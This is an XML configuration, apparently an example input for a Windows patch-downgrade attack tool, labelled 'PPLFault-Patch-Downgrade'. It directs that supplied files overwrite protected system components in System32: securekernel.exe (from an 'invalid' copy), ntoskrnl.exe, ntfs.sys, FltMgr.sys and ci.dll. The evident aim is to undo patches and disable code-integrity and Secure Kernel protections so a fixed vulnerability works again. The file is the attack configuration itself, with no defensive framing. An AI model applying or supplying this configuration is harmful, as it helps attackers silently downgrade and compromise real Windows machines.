<Configuration>
    <UpdateFilesList>
        <UpdateFile source="%CWD%\examples\PPLFault-Patch-Downgrade\UpdateFiles\invalid_securekernel.exe" destination="C:\Windows\System32\securekernel.exe" />
        <UpdateFile source="%CWD%\examples\PPLFault-Patch-Downgrade\UpdateFiles\ntoskrnl.exe" destination="C:\Windows\System32\ntoskrnl.exe" />
        <UpdateFile source="%CWD%\examples\PPLFault-Patch-Downgrade\UpdateFiles\ntfs.sys" destination="C:\Windows\System32\Drivers\ntfs.sys" />
        <UpdateFile source="%CWD%\examples\PPLFault-Patch-Downgrade\UpdateFiles\ntfs.sys.mui" destination="C:\Windows\System32\Drivers\en-US\ntfs.sys.mui" />
        <UpdateFile source="%CWD%\examples\PPLFault-Patch-Downgrade\UpdateFiles\FltMgr.sys" destination="C:\Windows\System32\Drivers\FltMgr.sys" />
        <UpdateFile source="%CWD%\examples\PPLFault-Patch-Downgrade\UpdateFiles\FltMgr.sys.mui" destination="C:\Windows\System32\Drivers\en-US\FltMgr.sys.mui" />
        <UpdateFile source="%CWD%\examples\PPLFault-Patch-Downgrade\UpdateFiles\ci.dll" destination="C:\Windows\System32\ci.dll" />
        <UpdateFile source="%CWD%\examples\PPLFault-Patch-Downgrade\UpdateFiles\ci.dll.mui" destination="C:\Windows\System32\en-US\ci.dll.mui" />
    </UpdateFilesList>
</Configuration>